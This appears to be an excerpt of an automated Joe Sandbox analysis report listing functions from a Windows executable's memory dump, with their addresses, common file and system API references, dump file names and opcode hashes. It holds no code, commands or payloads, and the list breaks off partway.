Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction Fuzzy Hash: C1116A2AA0CB95D5E762BF11E8007A9B360FF88B85FC48131EA8C03664EFBCD155C758

Function 00007FF741EA126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA24C0: CreateFileW.KERNELBASE ref: 00007FF741EA259B
Part of subcall function 00007FF741EA24C0: GetLastError.KERNEL32 ref: 00007FF741EA25AE
Part of subcall function 00007FF741EA24C0: CreateFileW.KERNEL32 ref: 00007FF741EA260E
Part of subcall function 00007FF741EA24C0: GetLastError.KERNEL32 ref: 00007FF741EA2617

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA15D0

Part of subcall function 00007FF741EA3980: MoveFileW.KERNEL32 ref: 00007FF741EA39BD
Part of subcall function 00007FF741EA3980: MoveFileW.KERNEL32 ref: 00007FF741EA3A34

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 34527147-0
Opcode ID: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
Instruction ID: 08a98a2467b413d827a31ba794e05bf223048635c5de5c937148b8371b250c12
Opcode Fuzzy Hash: a3f7aeee67f5c6efee88f6f2c4f2f574ca9db3d7719bf1359f9a84a60e1a1e68
Instruction Fuzzy Hash: 0B91EF2AB2C662C2EB11FF22E4442ADA361FB44BC5F840032EE4D07B95DFB9D549C310

Function 00007FF741EA51A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF741EA51D5

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction ID: f5b4da48ae25eb144b5026ddcdb39ae8650fe2b2a1f0d49c1e729bd801a6b91f
Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
Instruction Fuzzy Hash: 5401177990C652CAF726BB00E84077AB3A1BBD8356FD40234E65D42790DBBCE5058A20

Function 00007FF741EC8C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF741EC8DD3

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction ID: 8e46e89dd9246b3e4413fc85b21b2c2b99801212a8e764b1b9e77482b2b98020
Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
Instruction Fuzzy Hash: D9817829A1C222C6FB6ABA148E40E7DA794FF51746F901431ED0987685EFBDE803C721

Function 00007FF741EC89A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF741EC8B3A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction ID: 2c6b7df5993019ab67f12eff35d07c2ecd6441de7767193a27656788d4d5b616
Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
Instruction Fuzzy Hash: 21715D2DA4C263C6FBAA791D8A40A7DD390BF41746F941531CD0987686EFADE847C720

Function 00007FF741EAC96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

gj, xrefs: 00007FF741EAC97B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction ID: 97e24b0a1d58918f77e69b084c86fd0a57c784a699b8f30d3ce2deeee3930c82
Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
Instruction Fuzzy Hash: 935191377286908BD725DF25E400A9EB3A5F388798F445126EF4A93B09CB3DE945CF40

Function 00007FF741ECC838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF741ECC874

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction ID: d923e6fc9af7894b390605e91947de23cebdc8827b969f7f45c9ed5953d280db
Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
Instruction Fuzzy Hash: 88418D36718B69C5EB05BF2AE8141A9B3A1B758FD0B8D9036EE1D87764EE7CD041C340

Function 00007FF741ED0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF741ED0D24

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction ID: 4f1ab57cc4fc6fced805b2401c8e446644d337471ae99e2184f1358f52468719
Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction Fuzzy Hash: 8BB09228E1BB12C2EB0A3B116C82254A2A4BF98B02FD88038D64C41330DE6C20A64720

Function 00007FF741EB3964 Relevance: .9, Instructions: 931COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction ID: a68510d3c8775aba4c72b6404041feb66c2e30d5a7c091c81dd50748c8d48988
Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
Instruction Fuzzy Hash: 078214AAA0D6D1C6D706FF28D5442BCBBA1F751B89F598236CB8E07385DA7CD845C320

Function 00007FF741E976C0 Relevance: .9, Instructions: 893COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction ID: e97f1b11b3c46ceddbf7b120d31627f1f85e6bd7f0934c4516e5700c17b8688b
Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
Instruction Fuzzy Hash: C1627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314

Function 00007FF741EB53F0 Relevance: .9, Instructions: 891COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction ID: 5b90ddb552c8a88293f0b589a70ed243ce8730c648f4e79dbb4046db9b81c216
Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
Instruction Fuzzy Hash: 2B8221BAA0D2E08AD726FF24D4446FCB7A1FB55B49F488236CA4E07789DA7C9445C720

Function 00007FF741EABB90 Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction ID: f98c799f7ef445d51d876f86ba95bddfa4e9ab77f449e2ead83d77a21dc8c1b5
Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
Instruction Fuzzy Hash: 7922E3B7B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB785DB38D505CB40

Function 00007FF741EB4B98 Relevance: .6, Instructions: 578COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction ID: 3144fa7760c3219c1b6d4b6d15039d88218268bde7242282dc2105bdce67ae74
Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
Instruction Fuzzy Hash: 3032F176A081A1CBE71EFF24D550ABC77A1FB54B09F408239DB4A87B88DB7CA850C750

Function 00007FF741E97288 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction ID: 8482f341ea93038f6dab761f51189823383f8e480ba38acb57e7c919469e481c
Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
Instruction Fuzzy Hash: 64C1BDB7B281A08FE351CF7AE400A9D7BB1F39878CB519125DF59A3B09D639E605CB40

Function 00007FF741EB2D58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction ID: 4d715f4b4d6ac76e4a216da08f034935de751abb7778be05e3e7cca243c311ba
Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
Instruction Fuzzy Hash: D2A1357AA0C1A2C6EB17FA24D4047B9A791FF90785F954335DA4917786CEBCE881C320

Function 00007FF741EAAF18 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction ID: ce58f501badb3e273786acfe192b6c4f51c473976b946964fffd14228fea3ec1
Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
Instruction Fuzzy Hash: A0C1F577A292F08DE302CBB5A4248FD3FB1F71E34DB464152EF9656B4AD6285201DB70

Function 00007FF741E9A310 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction ID: 4082b3cca96a344bf198d53d8c4dc1ba7e17b7010af4ff114b4a31ad2fd2e868
Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
Instruction Fuzzy Hash: 91912F66B1C5A196EB12FF29D8402FDA720FF96789F841031EF4E07649EE78E646C310

Function 00007FF741EAB534 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction ID: f031ca2bc1a7177a8ea7c498ce06e315eccfea47d416fc1c3df05a32dc850ea2
Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
Instruction Fuzzy Hash: 6C612527B0C1E189EB02FF7585104FDBFA1B7497C5B8A8032DE9A53646CABCE505CB24

Function 00007FF741EB21D0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction ID: 622d500b3a95cfe02c45c2f330e062d76c78348d5c6134331527b2ba440e98f0
Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
Instruction Fuzzy Hash: 42512173A1C1628BE72AFF28D5047BDB751FB84B49F844230DA494768ADE7DE541CB10

Function 00007FF741EB2AB0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction ID: 8b4322e2ecc4b702c576b1ad00e4f7dd1ebeaf1999329f9032b44ce789001c0a
Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
Instruction Fuzzy Hash: DB31F5B2A1C5928BD709FE16D69027EBBD1FB44381F448239DB4A83B42DEBCE045C710

Function 00007FF741ED58E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
